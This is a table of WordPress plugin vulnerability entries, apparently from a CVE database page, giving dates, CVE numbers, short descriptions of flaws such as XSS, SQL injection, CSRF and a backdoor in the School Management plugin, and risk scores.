Vulnerabilities
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2024-01-16 | CVE-2021-24567 | Cross-site Scripting vulnerability in Nickmomrik Simple Post The Simple Post WordPress plugin through 1.1 does not sanitize user input when an authenticated user Text value, then it does not escape these values when outputting to the browser leading to an Authenticated Stored XSS Cross-Site Scripting issue. | 5.4 |
| 2024-01-16 | CVE-2021-24869 | SQL Injection vulnerability in Wpfastestcache WP Fastest Cache The WP Fastest Cache WordPress plugin before 0.9.5 does not escape user input in the set_urls_with_terms method before using it in a SQL statement, leading to an SQL injection exploitable by low privilege users such as subscriber | 8.8 |
| 2024-01-16 | CVE-2021-24870 | Cross-Site Request Forgery (CSRF) vulnerability in Wpfastestcache WP Fastest Cache The WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload | 6.1 |
| 2024-01-16 | CVE-2021-25117 | Cross-Site Request Forgery (CSRF) vulnerability in Lesterchan Wp-Postratings The WP-PostRatings WordPress plugin before 1.86.1 does not sanitise the postratings_image parameter from its options page (wp-admin/admin.php?page=wp-postratings/postratings-options.php). | 4.8 |
| 2024-01-16 | CVE-2021-4227 | Injection vulnerability in OBG ARK Wysiwyg Comment Editor The ark-commenteditor WordPress plugin through 2.15.6 does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section | 5.3 |
| 2024-01-16 | CVE-2022-0402 | Cross-site Scripting vulnerability in Super-Forms Super Forms The Super Forms - Drag & Drop Form Builder WordPress plugin before 6.0.4 does not escape the bob_czy_panstwa_sprawa_zostala_rozwiazana parameter before outputting it back in an attribute via the super_language_switcher AJAX action, leading to a Reflected Cross-Site Scripting. | 6.1 |
| 2024-01-16 | CVE-2022-0775 | Incorrect Authorization vulnerability in Woocommerce The WooCommerce WordPress plugin before 6.2.1 does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment | 4.3 |
| 2024-01-16 | CVE-2022-1538 | Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import Theme Demo Import WordPress plugin before 1.1.1 does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed. | 7.2 |
| 2024-01-16 | CVE-2022-1563 | Unspecified vulnerability in Wpengine Wpgraphql The WPGraphQL WooCommerce WordPress plugin before 0.12.4 does not prevent unauthenticated attackers from enumerating a shop's coupon codes and values via GraphQL. | 5.3 |
| 2024-01-16 | CVE-2022-1609 | Code Injection vulnerability in Weblizar School Management The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. | 9.8 |